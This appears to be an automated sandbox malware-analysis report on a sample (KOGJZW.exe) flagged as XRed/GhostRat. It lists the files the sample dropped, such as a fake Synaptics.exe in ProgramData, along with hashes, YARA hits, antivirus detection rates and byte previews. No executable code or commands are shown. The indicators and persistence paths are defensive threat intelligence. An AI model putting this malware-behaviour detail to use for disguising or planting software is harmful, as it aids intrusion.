	wyySetups64.exe	Get hash	malicious	GhostRat	Browse	142.250.184.225 216.58.206.46

Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	118
Entropy (8bit):	3.5700810731231707
Encrypted:	false
SSDEEP:	3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
MD5:	573220372DA4ED487441611079B623CD
SHA1:	8F9D967AC6EF34640F1F0845214FBC6994C0CB80
SHA-256:	BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
SHA-512:	F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Synaptics.exe_a5c396d0e6d651f539cd1b6dccb863d9c272052_455b7b6e_5d3ee6c6-0f5d-4fe4-b684-134427407a08\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.1332559509278168
Encrypted:	false
SSDEEP:	192:7spVpsBdImc0BU/3DzJDzqjLOA/itzxwzuiFYZ24IO8EKDzy:OyL9BU/3JqjMKzuiFYY4IO8zy
MD5:	E12999C0AD538A3B8D4D6662B12B6B9C
SHA1:	360DC60E911EF8DECAF37E23279A1F90574417DE
SHA-256:	C1A6E730324CBE2A8DC84264606D482D680BF5011C1AB158F2F5585A5709B716
SHA-512:	6AC4D9FF674F65F037D84F1622802608F65C26CFB5B0630E067BE500627414A8866CD25A50D2592E3CC27CEF155EC211F8CA75F8357136ECD68FE4D984498710
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.0.2.7.9.4.9.0.4.2.6.5.2.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.0.2.7.9.5.3.3.0.8.2.8.6.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.d.3.e.e.6.c.6.-.0.f.5.d.-.4.f.e.4.-.b.6.8.4.-.1.3.4.4.2.7.4.0.7.a.0.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.1.6.5.f.0.0.9.-.3.1.e.f.-.4.3.b.7.-.a.4.f.3.-.b.7.e.0.f.a.a.7.3.4.d.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.y.n.a.p.t.i.c.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.f.0.0.-.0.0.0.1.-.0.0.1.3.-.8.b.3.c.-.f.a.1.d.a.5.5.a.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.9.9.a.1.3.7.d.5.9.3.d.d.a.9.d.1.5.8.d.c.8.b.6.b.7.7.2.0.d.e.b.0.0.0.0.1.f.0.4.!.0.0.0.0.a.3.5.d.7.3.e.5.4.e.4.b.a.1.6.6.a.c.3.0.8.8.9.f.5.7.f.a.5.8.2.8.4.8.8.1.1.0.2.a.!.S.y.n.a.p.t.i.c.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1AC2.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Mon Dec 30 10:25:50 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	2120040
Entropy (8bit):	2.2780285288310744
Encrypted:	false
SSDEEP:	12288:9FKxb34VAfvv5bGCQ74wxPSSzBhxDJJXCuR2zda:9FKeY3Q7XxDJJ2M
MD5:	D3776DC7538B62BC394F80A6FA667ADB
SHA1:	76836CB8A08EF1F3577775FB2C6C4C2301C78321
SHA-256:	9C9174A5BD6ED6ACC6477A7B6610050EAEBFE1245BA457F85825450ACEE887E7
SHA-512:	8DF4D1AAC022C46C95D2B042A72F6186E1EC83A073471D6DCBC3F72D84913C86CD4606E51551B1EA1CFCF276EBFA7898B102F909ECEB2189B862A3ECEE72BB90
Malicious:	false
Preview:	MDMP..a..... ........urg.............,...............3......$....S......Tw..............`.......8...........T................9...........S...........U..............................................................................eJ......8V......GenuineIntel............T............urg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2A44.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6316
Entropy (8bit):	3.7203621284765513
Encrypted:	false
SSDEEP:	192:R6l7wVeJqxL6jhsYiSyBpro89bGhsfLCm:R6lXJW6eYa5GafP
MD5:	E614347C1502A861FD90C351EC05289F
SHA1:	4A1D3D8307FF57C0ED43465E8B8D93CE95A7B3A2
SHA-256:	6828CD00E1EFFDD9E68BC40AAB7BEE8DDBD1F860F952B8043B24743B9B7D3A17
SHA-512:	98363311762F111FD98EEDA08A8F3928D73042AC5C1C89B20218A163AC72F2DD20AF164C33D9684ED330EA181519D0430F65025F5B34E073BD8B94DAD13F9428
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.9.3.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2AB3.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4572
Entropy (8bit):	4.445136928823073
Encrypted:	false
SSDEEP:	48:cvIwWl8zs4zJg77aI9JLyWpW8VYsYm8M4JFcFI5+q84RTSZ0d:uIjfWI7737VMJv5vTSZ0d
MD5:	213CBA0157E559D40FF8106C9B9C6634
SHA1:	68B47CC560ACA8A7120058E398867F22BB4D65FC
SHA-256:	2003C9531F9582CF815C916EE038C38BB8BC69E1B17F1ED3485123123D5C6254
SHA-512:	9DCE3E99ECE15789D19C8500CA1690D06B9E2FCF1E9C8F329B6E2201BF43904703F2A67F0071E12AD8353D7C274295BD0708EEB69BAFD76C7906F6BC784B6F92
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="653848" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Synaptics\RCX97B8.tmp

Download File

Process:	C:\Users\user\Desktop\KOGJZW.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	771584
Entropy (8bit):	6.6408899377896855
Encrypted:	false
SSDEEP:	12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9Imr:ansJ39LyjbJkQFMhmC+6GD9p
MD5:	7103F3EEC43BBABE34068295157F9F1C
SHA1:	A35D73E54E4BA166AC30889F57FA58284881102A
SHA-256:	2B6DB5563D77C827F5A662CB0A05359450DB29948863F9A5556C19CE14D05305
SHA-512:	F8A257ABA57A1EACF8F280651E74F97D2E14F326139282ABB506764C95FB57DB9C4708BAFD1AC027B030C40A866BE2BD04B3B0BFAC82F748B147E8A17DBD7188
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\RCX97B8.tmp, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\RCX97B8.tmp, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B.....................&....................@.......................... ...................@..............................B...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

C:\ProgramData\Synaptics\Synaptics.exe

Download File

Process:	C:\Users\user\Desktop\KOGJZW.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1730560
Entropy (8bit):	7.489425516936533
Encrypted:	false
SSDEEP:	49152:8nsHyjtk2MYC5GDQhloJfWt7Zs8O+XVe3wD:8nsmtk2aphlTpC8tXVZ
MD5:	B53BEBA4041F41281A5AA172F93FBDD6
SHA1:	D0755C4D85BD826135CED6CD007CDEAB6B58C077
SHA-256:	5E73EAAB677F6292E4A7E7A9180E4F80DBBDB5E2746D76244A65455883A2CA25
SHA-512:	CA08C9C149F2EDC89CBFC3900BDD7BDA972AFF9A4353AB6A62D7585872D3C84C9FDD6D11B0905038E40638574EA1B5772638F6CBFB521493FA13D81E22030B08
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 92%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B..........................................@..............................................@..............................B......0....................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...0...........................@..P....................................@..P........................................................................................................................................

C:\ProgramData\Synaptics\Synaptics.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\KOGJZW.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Temp\8i4I4rk.ini

Download File

Process:	C:\ProgramData\Synaptics\Synaptics.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
Category:	dropped
Size (bytes):	1652
Entropy (8bit):	5.247549834667974
Encrypted:	false
SSDEEP:	24:GgsF+06ISU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+4+pAZewRDK4mW
MD5:	9CECA5FC3DBC8639351E67BD9281266E
SHA1:	78558F7137B97B8409DBE8CAA38D6A3DC53631C9
SHA-256:	BF859531C26F927F269DEF1A6B238C4FFEF4C2C2CE21F437EEE9E90118F0B6D1
SHA-512:	DB6E7F3B12D53DF4B65F1952B3B443464D48A9651466702DACDA43B764D5D6EAAB95C0682A8A83AAFD445F07848C8FE7262C013B79A7ACB9F6EB0CCC838A4E37
Malicious:	false
Preview:	<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="-W5wwU9cOdw5pcUPmF4w2g">{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

C:\Users\user\AppData\Local\Temp\9ljQ2Cn.ini

Download File

Process:	C:\ProgramData\Synaptics\Synaptics.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
Category:	dropped
Size (bytes):	1652
Entropy (8bit):	5.2584448138126865
Encrypted:	false
SSDEEP:	24:GgsF+0IuSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+o+pAZewRDK4mW
MD5:	B8640E6E44621AD904F49AD445AE0E72
SHA1:	0D41F4DE95C0FBF241650145704612B258FBCF73
SHA-256:	AE2D43192AA2D15355A847127FBA447B7E7FE6211CE2C394FB98638ACC3006C8
SHA-512:	5DC9B9E16DC8F919E9164A6A5B159514684E8A4A744B3DCB4B5C2A746B82629586B6C76891DA95F2EACFED6E87D5376DCC6ABF9C2125DB6D9C3D82B664C7C65A
Malicious:	false
Preview:	<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="n6IJxpNBoeJzuv7vEG-k6g">{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

C:\Users\user\AppData\Local\Temp\IWXO6Cw.ini

Download File

Process:	C:\ProgramData\Synaptics\Synaptics.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
Category:	dropped
Size (bytes):	1652
Entropy (8bit):	5.264629978893413
Encrypted:	false
SSDEEP:	24:GgsF+0FLOSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+SLO+pAZewRDK4mW
MD5:	0E75E65BAD2294835203EC68238561CF
SHA1:	CAA977AA56F5BFC6A472C11B366B9E5630744EB4
SHA-256:	259D83DE2BB98151FE7770C5DDBE151CD58E6063A17475DD84491C818906EE51
SHA-512:	637856B34E423ED0E826338B6E8F5D458C79D32F16298BF34C9B3BEF97E4EA99273B0DE5C22689C74A06FD20F178379DE5E4CCB0B372681DDD1800348B9D6168
Malicious:	false
Preview:	<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="L-aZAwNfFyW87dZ9Okm1NA">{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

C:\Users\user\AppData\Local\Temp\JacVChx.ini

Download File

Process:	C:\ProgramData\Synaptics\Synaptics.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
Category:	dropped
Size (bytes):	1652
Entropy (8bit):	5.264737627126833
Encrypted:	false
SSDEEP:	24:GgsF+0fSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+U+pAZewRDK4mW
MD5:	98C2C19F2900C22E392EA92724F834E2
SHA1:	91EA7559DA38790555170AA4F76218F3DF6AF646
SHA-256:	57F0BB0D625C51AF6C16EE0D3C9FEA7EFDA3AE86E89FC18DCC4D9D23FC6C3F90
SHA-512:	CEC2FB702110C5406D76AB6C0C17BF504092B415A7A568215372A18E796475B58BF77F18138157787F6EDE1FD9CA95816F7757EFB4CE7DB0D1FE4D037E6F2AF3
Malicious:	false
Preview:	<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="5tnXEU_MXZpAo1gD49HHOg">{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

C:\Users\user\AppData\Local\Temp\JdQuAQv.ini

Download File

Process:	C:\ProgramData\Synaptics\Synaptics.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
Category:	dropped
Size (bytes):	1652
Entropy (8bit):	5.262109511578249
Encrypted:	false
SSDEEP:	24:GgsF+0+1cSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+vK+pAZewRDK4mW
MD5:	0D3D8AD6F75A0B39028D6A5E9E009AB5
SHA1:	22632D65D15810247135CFE8B3BA120C05772B69
SHA-256:	88B3463BF65602AEA928943408DDC24D8E72082579FE25426BC17190637EBFC6
SHA-512:	8E5C857365DDDE618490A94CF06313471C5B86316A001DA94AA03EE64BA40DA04BABDA477EF0D684DB05AB452A85684610D35827BABB7ED055AD018F48296530
Malicious:	false
Preview:	<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="W_5vchQULa4e2My-VUjLcQ">{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

C:\Users\user\AppData\Local\Temp\M4c7XrP.ini

Download File

Process:	C:\ProgramData\Synaptics\Synaptics.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
Category:	dropped
Size (bytes):	1652
Entropy (8bit):	5.26386381212899
Encrypted:	false
SSDEEP:	24:GgsF+0NSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+2+pAZewRDK4mW
MD5:	266815E444C3247B712217BC67183055
SHA1:	C00C57E97421E1C71288122CA8DD0867C044CF3C
SHA-256:	CAC6AE8E17595CB70448541D3183400352E1F1B477BCE6D0164BE20EC9753367
SHA-512:	FA96A502D81DE893E3048EF64214AA2E32E3EC47B1EDB0FA383F3D71B54717EB3E4908C5535CC2EBF815A601F2CB1956E1636F5B56912B0A01502470D8183459
Malicious:	false
Preview:	<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="f-ONc2b3UKnCMyiDVn_6Vg">{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

C:\Users\user\AppData\Local\Temp\ULkMszb.ini

Download File

Process:	C:\ProgramData\Synaptics\Synaptics.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
Category:	dropped
Size (bytes):	1652
Entropy (8bit):	5.282785117142884
Encrypted:	false
SSDEEP:	24:GgsF+0ZusHSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+nsH+pAZewRDK4mW
MD5:	E039F2759EFAACAE4EC959F4716C5187
SHA1:	53BE91F5CAAC1060B4661D9152622534B1613870
SHA-256:	9ED6E7F6F6AB3DCD2306A6F4F61910F61BA483ECC0EE04F3C7A90DEF7751B82E
SHA-512:	5AEAB70C3B2EDBF987A3D7B69C10A0588DB66AE89BF16079375C3CF9A7472B24CC261FBE37B3900E7EA40756EB74E1C1CAFB53C496295A4055BFEDF6A85C883D
Malicious:	false
Preview:	<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="VXMmBA9pjJ7GKjRf8TPeWA">{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

C:\Users\user\AppData\Local\Temp\Ul3jTYP.ini

Download File

Process:	C:\ProgramData\Synaptics\Synaptics.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
Category:	dropped
Size (bytes):	1652
Entropy (8bit):	5.262020626507667
Encrypted:	false
SSDEEP:	24:GgsF+0UDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+/+pAZewRDK4mW
MD5:	F15CB82A9164DBFA38412DA4E7CE69DB
SHA1:	E53C25363E6416A64B1D16342B1046BF4025D69A
SHA-256:	748BD80375450A2D1432C9E2E308EFFE27DD186D0C9C6A184CBCB039B7A3FB2A
SHA-512:	4392419DBFDD4C8DB3D282158CFDBA4036545D261F39E07483CD2581706FE2CE06EB9386557E0BD932FE6F1C7390F237EDB99D02A5A5216E80ACDF8DF2861CE4
Malicious:	false
Preview:	<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="1yCDPdj_r2-q3r5MmW5PlQ">{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

C:\Users\user\AppData\Local\Temp\Vlf84l4.ini

Download File

Process:	C:\ProgramData\Synaptics\Synaptics.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
Category:	dropped
Size (bytes):	1652
Entropy (8bit):	5.261798031239156
Encrypted:	false
SSDEEP:	24:GgsF+0q09ISU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Gy+pAZewRDK4mW
MD5:	0F2A16B919598FD378DAF0F580FCC086
SHA1:	D10D474900CDF73DC11C2D5B12AF055C8432B49B
SHA-256:	613C638AF79BC1BB3980D70C7FAB7A7E75C773DA9CACB618B18194B5F0CA25A5
SHA-512:	AA8B775DC8133DE34897BF0478C96DF1BBDFC4F102A3DB7E86A8D875A7BA0D7847A1840A15E118C3D801DCA6BD1279149DBD6A03DF14EBF8F8BB6387E601DC2F
Malicious:	false
